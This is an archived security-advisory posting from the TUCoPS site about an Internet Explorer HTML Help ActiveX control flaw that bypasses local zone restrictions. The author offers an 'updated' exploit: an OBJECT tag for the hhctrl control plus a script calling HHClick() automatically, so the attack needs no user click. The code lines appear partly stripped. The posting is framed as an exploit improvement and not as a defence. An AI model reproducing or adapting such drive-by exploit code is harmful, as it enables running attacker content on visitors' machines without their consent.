TUCoPS :: Browsers :: hack7785.htm

Internet Explorer Help ActiveX Control Local Zone Security Restriction Bypass vuln (updated)
Internet Explorer Help ActiveX Control Local Zone Security Restriction Bypass Vulnerability (updated)



I appologize for the previous vulnerability (longnamevuln) because it was incomplete. After realizing my mistake, longnamevuln looked useless. However, it was just incomplete, not useless. What longnamevuln did was open a local file in the browser window. To execute active content, it needed to be opened in the help window. To do this, a window name parameter set to a blank window needed to be added. The updated code is designed for Malware's original local zone security restriction bypass which required the user click a button (http://malware.com/noceegar.html). The drag and drop vulnerability does not appear to be functional; however, the local zone security bypass vulnerability still appears to work fine. Instead of this (malware's code):



<OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">





</OBJECT>  



one would use this (my code):



<OBJECT id="hhctrl" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"codebase="hhctrl.ocx#Version=5,2,3790,1194"width=7% height=7% style="position:absolute;top:140;left:72;z-index:100;">









</OBJECT>

<script>

hhctrl.HHClick();

</script>



Notice that HHClick is automated, eliminating the need for user interaction (finally). My site, http://greyhats.cjb.net, will not be updated with the new code because it is a small change, and I don't want to go through the hassle of trying to deal with the ftp server on my unreliable host (hope websamba isnt reading this :).



That's all folks!

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH